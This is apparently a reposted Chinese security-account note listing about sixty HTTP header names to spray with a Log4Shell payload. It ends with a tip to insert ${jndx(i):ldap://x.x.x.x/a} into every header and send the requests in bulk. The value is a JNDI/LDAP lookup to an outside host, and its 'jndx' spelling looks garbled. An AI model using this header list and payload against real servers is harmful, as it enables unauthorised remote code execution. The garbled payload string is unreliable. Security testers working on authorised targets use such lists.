User-Agent:
Accept-Charset:
Accept-Datetime:
Accept-Encoding:
Accept-Language:
Cache-Control:
Cookie:
Forwarded:
Forwarded-For:
Forwarded-For-Ip:
Forwarded-Proto:
From:
Max-Forwards:
Origin:
Pragma:
Referer:
True-Client-Ip:
Via:
Warning:
X-Api-Version:
X-Att-Deviceid:
X-Correlation-Id:
X-Csrftoken:
X-Do-Not-Track:
X-Forward-For:
X-Forward-Proto:
X-Forwarded:
X-Forwarded-By:
X-Forwarded-For:
X-Forwarded-For-Original:
X-Forwarded-Host:
X-Forwarded-Port:
X-Forwarded-Proto:
X-Forwarded-Protocol:
X-Forwarded-Scheme:
X-Forwarded-Server:
X-Forwarded-Ssl:
X-Forwarder-For:
X-Frame-Options:
X-From:
X-Geoip-Country:
X-Http-Destinationurl:
X-Http-Host-Override:
X-Http-Method:
X-Http-Method-Override:
X-Http-Path-Override:
X-Https:
X-Htx-Agent:
X-Hub-Signature:
X-If-Unmodified-Since:
X-Imbo-Test-Config:
X-Insight:
X-Ip:
X-Ip-Trail:
X-ProxyUser-Ip:
X-Request-Id:
X-Requested-With:
X-Uidh:
X-Wap-Profile:
X-Xsrf-Token:
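Tip: when sending HTTP requests, you can use a web batch requester to add the HTTP headers above, with the value ${jndx(i):ldap://x.x.x.x/a}, and send the requests in bulk to verify the log4j2 vulnerability.
Originally published on the WeChat official account (ListSec): HTTP header summary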